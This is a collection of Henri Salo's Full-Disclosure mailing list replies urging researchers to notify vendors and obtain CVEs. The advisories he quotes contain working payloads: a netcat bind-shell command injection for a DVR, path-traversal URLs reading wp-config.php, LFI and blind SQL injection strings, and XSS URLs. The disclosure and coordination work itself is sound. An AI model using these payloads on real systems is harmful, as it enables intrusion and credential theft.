Re: [Full-disclosure] A question for the list - WordPress plugin inspections

[Henri Salo]

On Wed, Feb 19, 2014 at 08:58:49PM +, Harry Metcalfe wrote:
> Hi Seth,
> 
> There really isn't time for us to do that, in the context of an
> inspection. It's a very light-touch assessment.
> 
> When we find vulnerabilities we do also report those, after working
> with the vendor. And they are more detailed. For example:
> 
> https://security.dxw.com/advisories/moving-any-file-php-user-has-access-to-in-bp-group-documents-1-2-1/
> 
> Harry

People behind plug...@wordpress.org can help you with coordination. They can
also disable plugins so that there won't be new installations before maintainer
fixes issues. Note that security@ address should not be contacted when dealing
with plugin issues. It is important to get vulnerabilities fixed in upstream
codebase. I can also help you with communication, verification and such in my
own time.

---
Henri Salo


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Romanian hacker unknown string

[Henri Salo]

On Fri, Jan 17, 2014 at 05:07:00PM +0530, Asheesh Tripathi wrote:
> Yes Tried to reset password of one user account with this string

> >> "rt3y(iii#$%)yhyuhub3p3scpb3ll3muuulttreb265199403199403reb265tgzszrtech1"

You have at least good password policy.

---
Henri Salo


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Happy Holidays / Xmas Advisory

[Henri Salo]

On Thu, Dec 26, 2013 at 08:51:26AM -0800, Gage Bystrom wrote:
> And it just so kindly tells you were everything is located,  just in case
> you wanted to know
> 
> Ex:
> 
> http://demo.fatfreecrm.com/passwords/
> 
> I half expected to find password hashes but oh well that's life. It is a
> great "hack me" application when you can find random vulns simply by
> dicking around on your phone.

Please report issues to Github (if you care). As you can see the project reacts
to security issues. Three days in christmas time is not bad:

https://github.com/fatfreecrm/fat_free_crm/issues/300
https://github.com/fatfreecrm/fat_free_crm/wiki/Fixing-security-vulnerabilities-(27th-Dec-2013)

---
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Happy Holidays / Xmas Advisory

[Henri Salo]

On Tue, Dec 24, 2013 at 11:26:15AM +0100, joernchen wrote:
> A rather informal advisory on Fat Free CRM (http://fatfreecrm.com/):

I created https://github.com/fatfreecrm/fat_free_crm/issues/300 for tracking.

---
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ClipBucket v2.6-r738 Arbitrary File Upload 0-Day

[Henri Salo]

On Sat, Nov 16, 2013 at 12:53:38AM -0600, Rob Whitney wrote:
> This vulnerability was actually discovered after a client's website was
> hacked by a group spreading a Pro-Islamic message. Here is a redacted
> version of the access log at the point of exploitation.


Disclosure date 2009-10-19
http://osvdb.org/show/osvdb/59051

A lot of software using that piece of code are still vulnerable. Especially
plugins/modules. Also lot of attacks on-going using this in my honeypots
(AS29422). Attacks are not verifying software version numbers or existence of
the software. They just attack with all payloads and hope that some sites get
infected. I have been actively sending abuse-reports of those and notified
several project upstreams about the vulnerability. You can contact me off the
list if you are interested to get more information.

---
Henri Salo


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] XSS and CS vulnerabilities in aCMS

[Henri Salo]

On Thu, Aug 01, 2013 at 04:11:31PM +0300, MustLive wrote:
> 
> Timeline:
> 
> 
> 2013.03.04 - informed developers about part of the vulnerabilities.
> 2013.04.03 - informed developers about another part of the vulnerabilities.
> 2013.04.07 - informed developers about another part of the vulnerabilities.
> 2013.05.24 - announced at my site.
> 2013.05.25 - informed developers about another part of the vulnerabilities.
> 2013.05.26 - informed developers about another part of the
> vulnerabilities. In all cases the developers just ignored all
> messages via different e-mails and contact form.
> 2013.07.31 - disclosed at my site (http://websecurity.com.ua/6535/).

How did vendor ignore you in 2013.05.26 entry exactly?

---
Henri Salo


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 0day Vulnerability in VLC (this is my first release of the vuln anywhere)

[Henri Salo]

On Tue, Apr 23, 2013 at 02:58:43PM +0300, Georgi Guninski wrote:
> please don't spam your opinion on every message you dislike.

I did not dislike the message. I believe they are making some good research.

> counterspam:  if you ask me, don't notify the vendor unless there is
> some good external reason.

Point of contacting vendor is to get the issues fixed without creating
unnecessary security risks to users of the program.

To quote Jay: "just because of the lack of testing so far" so now he knows I can
help if needed. You are free to ignore my emails if you concider them as a spam.
I sure hope I am not the only person in the list who wishes responsible
disclosure.

---
Henri Salo


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 0day Vulnerability in VLC (this is my first release of the vuln anywhere)

[Henri Salo]

On Mon, Apr 22, 2013 at 07:31:07AM -0400, jay van wrote:
> if VLC media player is launched in QT mode and the user is on windows NT
> (any version of windows so far as tested) connected to the internet there
> is a vulnerability in the handling of unicast packets. The Proof of concept
> code is in development and should be ready for publishing within the next 2
> weeks. More in depth vulnerability information will be released with the
> proof of concept. This is a joint effort (the POC (proof of concept) code
> and vuln discovery) by 2 security firms. 4sData IT solutions and another
> firm that would like to remain nameless for the time being. This
> vulnerability exposes almost everyone using VLC media player (unless on
> linux systems and thats just because of the lack of testing so far may
> still be found to be exposed.). Thank you for your time and if interested
> please respond and let me know,.
> 
>  - Jay @ 4sData-IT-Solutions (www.4sdata.com - coming soon)
> 
>   P.S. Launching 4sData this week to coincide with the VLC vuln.

Please follow responsible disclosure and report issues first to the vendor and
go public after waiting for a fix (or no reply). VLC usually replies to
important issues very fast. Please contact me in case you need a hand in
communication.

---
Henri Salo


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Allegro.pl XSS [0-day]

[Henri Salo]

On Thu, Apr 11, 2013 at 06:27:28PM +0200, Kacper Szczesniak wrote:
> Hi All!
> 
> I was looking for a 19" rack mount today and found this XSS instead:
> http://allegro.pl/listing/listing.php?string=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
> 
> it turns out to be a custom data-headline attribute that is not properly 
> escaped
> 
> tested on Firefox 20, Chrome and others need an xss filter bypass
> 
> kacper

And? Did you report this to allegro.pl owners? Even to security@- and
abuse@-addresses? How is this 0day issue?

---
Henri Salo


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WP FuneralPress - Stored XSS in Guestbook

[Henri Salo]

On Sun, Mar 31, 2013 at 11:58:59AM +0100, Peter Westwood wrote:
> On 31 Mar 2013, at 08:25, Henri Salo  wrote:
> 
> > On Sun, Mar 31, 2013 at 11:56:05AM +1300, Rob Armstrong wrote:
> >> # WP FuneralPress - stored xss in guestbook
> >> #
> >> # "FuneralPress is an online website obituary management and guest book
> >> program for funeral homes and cemeteries"
> >> # http://wpfuneralpress.com/
> >> #
> >> # tested on: funeralpress version 1.1.6 / wordpress version 3.5.1
> >> #
> >> # impact:
> >> #   malicious script execution as wordpress administrator
> >> #
> >> # author: robarmstrong.t...@gmail.com
> > 
> > Did you report this to the plugin developer? Is this fixed in some version? 
> > Does
> > this have CVE identifier? It's pretty disturbing if someone actually uses
> > vulnerabilities like these to infect others.
> 
> Also, I guess this wasn't reported to the plugin review team at WP.org so I 
> forwarded it to them there - there is a free version of this plugin available 
> for download there
> 
> -- 
> Peter Westwood
> Automattic | WordPress.com | WordPress.org

I did that too. Forgot to include it in my email, sorry.

---
Henri Salo


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WP FuneralPress - Stored XSS in Guestbook

[Henri Salo]

On Sun, Mar 31, 2013 at 11:56:05AM +1300, Rob Armstrong wrote:
> # WP FuneralPress - stored xss in guestbook
> #
> # "FuneralPress is an online website obituary management and guest book
> program for funeral homes and cemeteries"
> # http://wpfuneralpress.com/
> #
> # tested on: funeralpress version 1.1.6 / wordpress version 3.5.1
> #
> # impact:
> #   malicious script execution as wordpress administrator
> #
> # author: robarmstrong.t...@gmail.com

Did you report this to the plugin developer? Is this fixed in some version? Does
this have CVE identifier? It's pretty disturbing if someone actually uses
vulnerabilities like these to infect others.

---
Henri Salo


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] XSS vulnerability on WP-Banners-Lite (wordpress plugin)

[Henri Salo]

On Mon, Mar 25, 2013 at 08:53:28AM -0300, Fernando A. Lagos B. wrote:
> I. Background
> --
> [-] Affected plugin: WP Banners Lite
> [-] Plugin Description: The plugin easily allows you to manage ad
> banners on your site.
> [-] Plugin URL: http://wordpress.org/extend/plugins/wp-banners-lite/
> [-] Tested Version: 1.29, 1.31, 1.40
> [-] Reported: YES - but no answer
> [-] Report Date: 03/12/13
> [-] Published:
> http://blog.zerial.org/seguridad/vulnerabilidad-en-plugin-para-wordpress-afecta-a-mas-de-200-sitios/

You can report next issue to the pluginswordpress.org address and they 
will
remove the plugin from showing up in plugin index site[1] or whatever it is
called and users can't install it using WordPress administrator-interface before
developer of the plugin has fixed the vulnerability. I will send the
plugins-guys email right now to get the process on-going. You can also directly
contact me in case you need help coordinating issues. Have a great day.

1: http://wordpress.org/extend/plugins/wp-banners-lite/

--
Henri Salo


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: Remote command injection vulnerability in Rosewill RSVA11001 (Hi3515 based)

[Henri Salo]

On Sun, Mar 24, 2013 at 05:43:43PM -0400, Eric Urban wrote:
> I have been hacking on a Rosewill RSVA11001 for a while now, something to
> suck up my free time. I had pulled apart the firmware previously but did
> not succeed in finding a way to get a shell on the device. The box is
> Hi3515 based, I found an exploit for another similar box (Ray Sharp) but it
> did not work. The Rosewill firmware seems to use an executable that listens
> on two ports rather one when communicating with the Windows-based control
> software. Port 8000 is now the command port rather 9000, 9000 is used for
> video only. After playing with the included Windows application I
> eventually did a strings on the 'hi_dvr' exectuable that is the user space
> program that controls the interface to thing. I found this gem:
> 
> /mnt/ntpdate -q %s > /tmp/tmpfs/ntptmp
> 
> So I used the windows software to set the NTP host to
> 
> a;/usr/bin/nc -l -p 5555 -e /bin/sh&

Did you report this to the vendor?

--
Henri Salo


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in SWFUpload in multiple web applications: WordPress, Dotclear, InstantCMS, AionWeb and others

[Henri Salo]

So have many of these did you report to the developers of the software? Please
give links to bug tracker, changelog or similar.

---
Henri Salo


signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] XSS vulnerabilities in em-shorty, RepRapCalculator, Fulcrum, Django and aCMS

[Henri Salo]

On Fri, Mar 01, 2013 at 11:50:00PM +0200, MustLive wrote:
> I'm resending my letter from February 23, 2013 (since FD was not working
> that day).
> 
> After my previous list of vulnerable software with ZeroClipboard.swf, here
> is a list of software with ZeroClipboard10.swf. These are Cross-Site
> Scripting vulnerabilities in em-shorty, RepRapCalculator, Fulcrum, Django
> and aCMS.
> 
> Earlier I've wrote about Cross-Site Scripting vulnerabilities in
> ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote
> that this is very widespread flash-file and it's placed at tens of thousands
> of web sites. And it's used in hundreds of web applications. Among them are
> em-shorty, RepRapCalculator, Fulcrum (CMS), Django and aCMS. And there are
> many other vulnerable web applications with ZeroClipboard10.swf (some of
> them also contain ZeroClipboard.swf).

So did you report this vulnerability to those projects? Even to security@ or
similar address? I noticed this vulnerability from WordPress plugins. Did you
report those? Did you ask CVE identifiers?

--
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in WordPress Attack Scanner for WordPress

[Henri Salo]

On Wed, Jan 30, 2013 at 08:31:57PM +0200, MustLive wrote:
> Information Leakage (WASC-13):
> 
> http://site/wp-content/plugins/path/data.txt
> http://site/wp-content/plugins/path/archive.txt
> 
> Folder "path" can be WP-Attack-Scanner or WP-Attack-Scanner-Free.
> 
> Unrestricted access to the data - they can be accessed in the browser 
> without authorization. Even the data is encrypted, but by default the 
> password is "changepassword". If the password was not changed, then the data 
> is easily decrypting. If it was changed, then the password can be picked up.

What data is stored to those files?

--
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Looking for security contacts

[Henri Salo]

On Tue, Jan 22, 2013 at 09:45:39AM +0100, DefenseCode wrote:
> Hi,
> 
> We're looking for security contacts of the following companies:
> - US Robotics
> - Asus
> - NetGear
> - Zyxel
> - TP-Link
> - D-Link
> 
> Regards,
> Leon Juranic
> CEO
> DefenseCode
> http://www.defensecode.com/

Good luck.

- Henri

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Wordpress Pingback Port Scanner

[Henri Salo]

On Sat, Jan 19, 2013 at 08:53:24PM +0200, MustLive wrote:
> And when WordPress developers turned in on in WordPress 3.5 they returned 
> the hole back to the masses. Earlier for WP 2.6 - 3.4.2 only those web sites 
> were vulnerable, which had turned it on, then since WP 3.5 all web sites 
> would be vulnerable again.

First of all I am impressed that you MustLive have studied this issue so much 
and given valuable information to this mailing list. Thank you. I'll bet you 
can give lot to the community if you start to find vulnerabilities from 
important software and don't waste time to non-issues (not saying that you 
haven't done this already in some level).

Could you give me references where WordPress developers enabled XML-RPC again? 
In my opinion this is not wise decision. The interface should have at least 
some kind of ACL enabled. I have no idea what is now allowed or is there 
possibility to configure the interface. Last time I tested this interface it 
did need authentication to do some of the tasks. I did not check all of them.

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] XSS, LFI and SQL Injection Vulnerabilities in Achievo

[Henri Salo]

On Thu, Nov 01, 2012 at 02:12:10PM +0200, Netsparker Advisories wrote:
> Information
> 
> Name :  XSS, LFI and SQL Injection Vulnerabilities in Achievo
> Software :  Achievo 1.4.5 and possibly below.
> Vendor Homepage :  http://www.achievo.org
> Vulnerability Type :  Cross-Site Scripting, Local File Inclusion and SQL
> Injection
> Severity :  Critical
> Researcher :  Canberk Bolat
> Advisory Reference :  NS-12-016
> 
> Description
> 
> Achievo is a flexible web-based resource management tool for business
> environments. Achievo's resource management capabilities will enable
> organisations to support their business processes in a simple, but
> effective manner.
> 
> Details
> 
> Achievo is affected by XSS, LFI and SQL Injection vulnerabilities in
> version 1.4.5.
> XSS: http://example.com/dispatch.php (GET: atklevel, atkaction, atkstackid,
> atkselector, atkfilter, searchString)
> LFI:
> http://example.com/dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3
> SQL Injection:
> http://example.com/achievo-1.4.5/dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1&atkprevlevel=0&=3
> You can read the full article about Cross-Site Scripting, LFI and SQL
> Injection vulnerabilities from here:
> 
> Cross-site Scripting (XSS):
> http://www.mavitunasecurity.com/crosssite-scripting-xss/
> Local File Inclusion: http://www.mavitunasecurity.com/local-file-inclusion/
> Blind SQL Injection: http://www.mavitunasecurity.com/blind-sql-injection/
> 
> Solution
> 
> -
> 
> Advisory Timeline
> 
> 23/01/2011 - First contact
> 25/02/2012 - Second contact - No response
> 01/11/2012 - Advisory released
> 
> Credits
> 
> It has been discovered on testing of Netsparker, Web Application Security
> Scanner - http://www.mavitunasecurity.com/netsparker/.
> 
> References
> 
> Vendor Url / Patch : -
> MSL Advisory Link :
> http://www.mavitunasecurity.com/xss-lfi-and-sql-injection-vulnerabilities-in-achievo/
> Netsparker Advisories :
> http://www.mavitunasecurity.com/netsparker-advisories/
> 
> About Netsparker
> 
> Netsparker® can find and report security issues such as SQL Injection and
> Cross-site Scripting (XSS) in all web applications regardless of the
> platform and the technology they are built on. Netsparker's unique
> detection and exploitation techniques allows it to be dead accurate in
> reporting hence it's the first and the only False Positive Free web
> application security scanner.

Where did you report this vulnerability? Achievo-project does reply to emails 
and fix security vulnerabilities. Does this vulnerability have CVE-identifier, 
which would help in communication.

I can report this to the project again and request CVE-identifier if needed. 
Please confirm that this is OK for you.

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cookie stealing and XSS vulnerable in Zenphoto version 1.4.3.2

[Henri Salo]

On Tue, Oct 02, 2012 at 07:16:11AM +0100, Scott Herbert wrote:
> -
> Affected products:
> -
> 
> Product : Zenphoto 1.4.3.2 (and maybe older) fixed in 1.4.3.3
> Affected function:printPublishIconLink
> 
> --
> Details:
> --
> 
> The file admin-news-articles.php calls the function printPublishIconLink
> which generates HTML from data stored in the $_GET super global, this can be
> used to generate a XSS attack or more seriously, as a admin user need to be
> logged in to access the page admin-news-articles.php, a cookie stealing
> script.
> 
> Example code:
> http://127.0.0.1/zenphoto/zp-core/zp-extensions/zenpage/admin-news-articles.
> php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3
> C/script%3E%3C>
> 
> 
> Suggested fix:
> 
> 
> Sanitize the $_GET super global on lines 1637 through 1641 in
> zenpage-admin-functions.php file
> 
> 
> Timeline:
> 
> 
> 12-Sept-2012  Zenphoto and UK-CERT informed
> 18-Sept-2012 Zenphoto confirmed and fixed (see
> http://www.zenphoto.org/trac/changeset/10836).
> 1-Oct-2012 Zenphoto 1.4.3.3 released fixing hole.
> 
> --
> Scott Herbert Cert Web Apps (Open)
> http://blog.scott-herbert.com/
> Twitter @Scott_Herbert

Identifier CVE-2012-4519 has been assigned for this issue 
http://www.openwall.com/lists/oss-security/2012/10/11/4

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Cookie stealing and XSS vulnerable in Zenphoto version 1.4.3.2

[Henri Salo]

On Tue, Oct 02, 2012 at 07:16:11AM +0100, Scott Herbert wrote:
> -
> Affected products:
> -
> 
> Product : Zenphoto 1.4.3.2 (and maybe older) fixed in 1.4.3.3
> Affected function:printPublishIconLink
> 
> --
> Details:
> --
> 
> The file admin-news-articles.php calls the function printPublishIconLink
> which generates HTML from data stored in the $_GET super global, this can be
> used to generate a XSS attack or more seriously, as a admin user need to be
> logged in to access the page admin-news-articles.php, a cookie stealing
> script.
> 
> Example code:
> http://127.0.0.1/zenphoto/zp-core/zp-extensions/zenpage/admin-news-articles.
> php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3
> C/script%3E%3C>
> 
> 
> Suggested fix:
> 
> 
> Sanitize the $_GET super global on lines 1637 through 1641 in
> zenpage-admin-functions.php file
> 
> 
> Timeline:
> 
> 
> 12-Sept-2012  Zenphoto and UK-CERT informed
> 18-Sept-2012 Zenphoto confirmed and fixed (see
> http://www.zenphoto.org/trac/changeset/10836).
> 1-Oct-2012 Zenphoto 1.4.3.3 released fixing hole.
> 
> --
> Scott Herbert Cert Web Apps (Open)
> http://blog.scott-herbert.com/
> Twitter @Scott_Herbert

Hello list,

Zenphoto 1.4.3.3 (tar.gz 3fe44951e33e726d2bba229880885075) is still affected by 
this vulnerability. Please notice "OSVDB is not aware of a solution for this 
vulnerability. The original disclosure states that the vendor claimed to have 
fixed this issue in version 1.4.3.3, but Secunia has confirmed it to still be 
vulnerable." from http://osvdb.org/85899 and I verified this manually. Does 
this vulnerability have CVE-identifier?

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] cloudsafe365 for wordpress: file disclosure

[Henri Salo]

On Tue, Aug 28, 2012 at 09:59:19PM +1000, craig deveson wrote:
> Issue has been resolved in version 1.47

In which revision? This looks like up-to-date repository: 
http://plugins.svn.wordpress.org/cloudsafe365-for-wp/

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] cloudsafe365 for wordpress: file disclosure

[Henri Salo]

On Tue, Aug 28, 2012 at 11:00:25AM +0200, Christian Sciberras wrote:
> So this plugin supposedly helps securing a website?

I do not know anything about this plugin but at least we can coordinate the 
fixes or get the plugin disabled so that more people don't start using it.

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] cloudsafe365 for wordpress: file disclosure

[Henri Salo]

On Tue, Aug 28, 2012 at 10:29:46AM +0200, Jan van Niekerk wrote:
> This wordpress security plugin lets you read arbitrary files on the
> system.  Looking at the code, there will be plenty of stuff like this.
> 
> Demo:
>   
> http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php
>   
> http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php
> 
> Disclosure timeline:
>  * Today: visit wordpress.org
>  * Try to report bug
>  * System wants login
>  * Visit web site: vendor has no e-mail address and stupid one-liner
> contact form and hidden name
>  * Stuff it, I'm not going to phone them

I can verify and report this. Could you list all the vulnerabilities you can 
find from the plugin? You can also contact plug...@wordpress.org address in 
case you found vulnerabilities from WordPress plugins in the future.

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] XSS and SQL Injection Vulnerabilities in Jara

[Henri Salo]

On Wed, Aug 22, 2012 at 12:33:37PM +0300, Netsparker Advisories wrote:
> Information
> 
> Name :  XSS and SQL Injection Vulnerabilities in Jara
> Software :  Jara 1.6 and possibly below.
> Vendor Homepage :  http://sourceforge.net/projects/jara/
> Vulnerability Type :  Cross-Site Scripting and SQL Injection
> Severity :  Critical
> Researcher :  Canberk Bolat
> Advisory Reference :  NS-12-009
> 
> Description
> 
> An open source simple blog utilising the features of PHP 5 and MySQL
> 5. Supports multiple writers, categories, managing posts, static
> content pages and post comments as well as providing an intuitive
> administration panel.
> 
> Details
> 
> Jara is affected by XSS and SQL Injection vulnerabilities in version 1.6.
> 
> Example PoC urls are as follows :
> 
> SQL Injection Vulnerabilities
> http://example.com/login.php (POST - username)
> http://example.com/login.php (POST - password)
> http://example.com/admin/delete_page.php?id='%2BNSFTW%2B'
> http://example.com/admin/delete_post.php?id='%2BNSFTW%2B'
> http://example.com/admin/delete_category.php?id='%2BNSFTW%2B'
> http://example.com/admin/delete_user.php?id='%2BNSFTW%2B'
> http://example.com/admin/edit_page.php?id='%2BNSFTW%2B'
> http://example.com/admin/edit_user.php?id='%2BNSFTW%2B'
> http://example.com/admin/edit_post.php (POST - id)
> http://example.com/admin/edit_category.php (POST - id)
> 
> XSS Vulnerabilities
> http://example.com/view.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0031F8)%3C/script%3E
> http://example.com/page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003214)%3C/script%3E
> http://example.com/category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0032D5)%3C/script%3E
> http://example.com/login.php (POST - username)
> http://example.com/login.php (POST - password)
> http://example.com/admin/delete_page.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
> http://example.com/admin/delete_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003548)%3C/script%3E
> http://example.com/admin/delete_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034CE)%3C/script%3E
> http://example.com/admin/delete_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
> http://example.com/admin/edit_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034D5)%3C/script%3E
> http://example.com/admin/edit_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003542)%3C/script%3E
> http://example.com/admin/edit_page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003569)%3C/script%3E
> http://example.com/admin/edit_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
> 
> 
> You can read the full article about Cross-Site Scripting and SQL
> Injection vulnerabilities from here :
> 
> Cross-site Scripting: http://www.mavitunasecurity.com/crosssite-scripting-xss/
> SQL Injection: http://www.mavitunasecurity.com/sql-injection/
> 
> Solution
> 
> No patch released.
> 
> Advisory Timeline
> 
> 19/11/2011 - Couldn’t found a contact e-mail
> 22/08/2012 - Vulnerability Released
> 
> Credits
> 
> It has been discovered on testing of Netsparker, Web Application
> Security Scanner - http://www.mavitunasecurity.com/netsparker/.
> 
> References
> 
> MSL Advisory Link :
> http://www.mavitunasecurity.com/xss-and-sql-injection-vulnerabilities-in-jara/
> Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/
> 
> About Netsparker
> 
> Netsparker® can find and report security issues such as SQL Injection
> and Cross-site Scripting (XSS) in all web applications regardless of
> the platform and the technology they are built on. Netsparker's unique
> detection and exploitation techniques allows it to be dead accurate in
> reporting hence it's the first and the only False Positive Free web
> application security scanner.
> 
> -- 
> Netsparker Advisories, 
> Homepage, http://www.mavitunasecurity.com/netsparker-advisories/

Also some of these issues have been listed in OSVDB. You should check 
vulnerability databases before posting advisories.

http://osvdb.org/show/osvdb/76484
http://osvdb.org/show/osvdb/83346
http://osvdb.org/show/osvdb/83345
http://osvdb.org/show/osvdb/83330

You might want to send a message to the project owner via URL 
https://sourceforge.net/sendmessage.php?touser=2328649

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] XSS Vulnerabilities in LabWiki

[Henri Salo]

On Wed, Aug 22, 2012 at 12:32:29PM +0300, Netsparker Advisories wrote:
> Information
> 
> Name :  XSS Vulnerabilities in LabWiki
> Software :  LabWiki 1.5 and possibly below.
> Vendor Homepage :  http://www.bioinformatics.org/phplabware/labwiki/index.php
> Vulnerability Type :  Cross-Site Scripting
> Severity :  Critical
> Researcher :  Canberk Bolat
> Advisory Reference :  NS-12-008
> 
> Description
> 
> This wiki is powered by Qwiki Wiki, a minimalist PHP wiki engine
> originally developed by David Barrett, that uses plain text files to
> store data. The 'engine' is used to edit the data as well as to format
> it and present it as a web page. Significant modifications were done
> to the codes of this wiki for bugs and enhancements (XHTML compliance,
> UTF-8 encoding, backup maintainance, page deletion, etc.) by Santosh
> Patnaik (SP) who also largely seeded the wiki with new and old
> (non-wiki) documents.
> 
> Details
> 
> LabWiki is affected by XSS vulnerabilities in version 1.5. Example PoC
> urls are as follows :
> 
> http://example.com/recentchanges.php?page_no='"-->alert(0x00039E)¬hing=nothing
> http://example.com/index.php?page=What_is_wiki&from='"-->alert(0x0001C7)
> 
> You can read the full article about Cross-Site Scripting vulnerability
> from here :
> 
> Cross-site Scripting: http://www.mavitunasecurity.com/crosssite-scripting-xss/
> 
> Solution
> 
> No patch released.
> 
> Advisory Timeline
> 
> 15/11/2011 - First contact: No response
> 01/01/2012 - Second contact: No response
> 22/08/2012 - Advisory Released
> 
> Credits
> 
> It has been discovered on testing of Netsparker, Web Application
> Security Scanner - http://www.mavitunasecurity.com/netsparker/.
> 
> References
> 
> MSL Advisory Link :
> http://www.mavitunasecurity.com/xss-vulnerabilities-in-labwiki/
> Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/
> 
> About Netsparker
> 
> Netsparker® can find and report security issues such as SQL Injection
> and Cross-site Scripting (XSS) in all web applications regardless of
> the platform and the technology they are built on. Netsparker's unique
> detection and exploitation techniques allows it to be dead accurate in
> reporting hence it's the first and the only False Positive Free web
> application security scanner.
> 
> -- 
> Netsparker Advisories, 
> Homepage, http://www.mavitunasecurity.com/netsparker-advisories/

